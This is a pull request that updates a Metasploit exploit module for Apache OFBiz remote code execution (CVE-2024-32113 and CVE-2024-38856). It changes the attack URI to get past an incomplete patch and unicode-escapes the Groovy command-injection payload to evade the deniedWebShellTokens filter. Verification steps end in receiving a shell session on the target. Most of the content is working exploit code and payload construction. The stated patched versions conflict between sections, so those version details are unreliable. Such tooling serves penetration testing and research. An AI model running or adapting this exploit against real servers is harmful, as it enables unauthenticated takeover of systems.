### PR TITLE
Update OFBiz ProgramExport RCE for Patch Bypass

### DIFF
--- a/documentation/modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md
+++ b/documentation/modules/exploit/multi/http/apache_ofbiz_forgot_password_directory_traversal.md
@@ -3,6 +3,19 @@ Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulne
 endpoint `/webtools/control/forgotPassword` allows an attacker to access the `ProgramExport` endpoint which in
 turn allows for remote code execution in the context of the user running the application.
 
+It was then discovered that the use of the path traversal vulnerability is not required in order to access
+the vulnerable endpoint ProgramExport. CVE-2024-38856 was given for this Incorrect Authorization vulnerability
+and was patched in 18.12.15.
+
+This module was originally written the exploit CVE-2024-32113, but upon the discovery of CVE-2024-38856 the
+module updated to not exploit the path traversal vulnerability allowing for exploitation on 18.12.14 as well.
+
+CVE-2024-32113, Path Traversal, patched in 18.12.13:
+`/webtools/control/forgotPassword;../ProgramExport`
+
+CVE-2024-38856, Incorrect Authorization, patched in 18.12.14:
+`/webtools/control/forgotPassword/ProgramExport`
+
 ### Description
 The module can exploit Apache OFBiz running on both Windows and Linux. OFBiz has list of `deniedWebShellTokens`
 which includes strings like `curl` and `chmod` which attempts to prevent ProgramExport from being exploited. The list

--- a/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
+++ b/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
@@ -13,11 +13,19 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Apache OFBiz Forgot Password Directory Traversal',
+        'Name' => 'Apache OFBiz forgotPassword/ProgramExport RCE',
         'Description' => %q{
-          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability. The vulnerable
-          endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint which in
-          turn allows for remote code execution in the context of the user running the application.
+          Apache OFBiz versions prior to 18.12.13 are vulnerable to a path traversal vulnerability (CVE-2024-32113). The
+          vulnerable endpoint /webtools/control/forgotPassword allows an attacker to access the ProgramExport endpoint
+          which in turn allows for remote code execution in the context of the user running the application. This was
+          patched in 18.12.14.
+
+          It was then discovered that the use of the path traversal vulnerability is not required in order to access
+          the vulnerable endpoint ProgramExport. CVE-2024-38856 was given for this Incorrect Authorization vulnerability
+          and was patched in 18.12.15.
+
+          This module was originally written the exploit CVE-2024-32113, but upon the discovery of CVE-2024-38856 the
+          module updated to not exploit the path traversal vulnerability allowing for exploitation on 18.12.14 as well.
         },
         'Author' => [
           'Mr-xn', # PoC
@@ -26,7 +34,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           [ 'URL', 'https://github.com/Mr-xn/CVE-2024-32113'],
           [ 'URL', 'https://xz.aliyun.com/t/14733?time__1311=mqmx9Qwx0WDsd5YK0%3Dai%3Dmd7KbxGupD&alichlgref=https%3A%2F%2Fgithub.com%2FMr-xn%2FCVE-2024-32113'],
-          [ 'CVE', '2024-32113']
+          [ 'CVE', '2024-32113'],
+          [ 'CVE', '2024-38856']
         ],
         'License' => MSF_LICENSE,
         'Platform' => %w[linux win],
@@ -71,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def send_cmd_injection(cmd)
     data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"
     send_request_cgi({
-      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword;/ProgramExport'),
+      'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword/ProgramExport'),
       'headers' => {
         'HOST' => '127.0.0.1'
       },

--- a/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
+++ b/modules/exploits/multi/http/apache_ofbiz_forgot_password_directory_traversal.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def send_cmd_injection(cmd)
-    data = "groovyProgram=throw+new+Exception('#{cmd}'.execute().text);"
+    data = "groovyProgram=#{to_unicode_escape("throw new Exception('#{cmd}'.execute().text);")}"
     send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/webtools/control/forgotPassword/ProgramExport'),
       'headers' => {
@@ -93,9 +93,9 @@ class MetasploitModule < Msf::Exploit::Remote
     echo_test_string = rand_text_alpha(8..12)
     case target['Type']
     when :win_cmd
-      test_payload = to_unicode_escape("cmd.exe /c echo #{echo_test_string}")
+      test_payload = "cmd.exe /c echo #{echo_test_string}"
     when :unix_cmd
-      test_payload = to_unicode_escape("echo #{echo_test_string}")
+      test_payload = "echo #{echo_test_string}"
     else
       return CheckCode::Unknown('Please select a valid target')
     end
@@ -121,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Remote
     when :win_cmd
       res = send_cmd_injection(payload.encoded)
     when :unix_cmd
-      res = send_cmd_injection(to_unicode_escape("sh -c $@|sh . echo #{payload.raw}"))
+      res = send_cmd_injection("sh -c $@|sh . echo #{payload.raw}")
     else
       fail_with(Failure::BadConfig, 'Invalid target specified')
     end


### PR DESCRIPTION
The patch for CVE-2024-32113 (the original vulnerability this exploited) was incomplete. The patch released in 18.12.14 disallows the Path Traversal vulnerability to be exploited however it was later disclosed that the vulnerable endpoint was accessible all along, without the need for the Path Traversal. And so CVE-2024-38856 was issued as a Incorrect Authorization which was patched in 18.12.15.

## Summary 
CVE-2024-32113, Path Traversal, patched in 18.12.14:
`/webtools/control/forgotPassword;../ProgramExport`

CVE-2024-38856, Incorrect Authorization, patched in 18.12.15:
`/webtools/control/forgotPassword/ProgramExport`
## Verification

List the steps needed to make sure this thing workskal

- [ ] Spin up Apache OFBiz 18.12.14
- [ ] Start `msfconsole`
- [ ]  Do: `use apache_ofbiz_forgot_password_directory_traversal`
- [ ]  Set the `RHOST` and `LHOST` options
- [ ]  Run the module
- [ ]  Receive a session in the context of the user running Apache OFBiz.


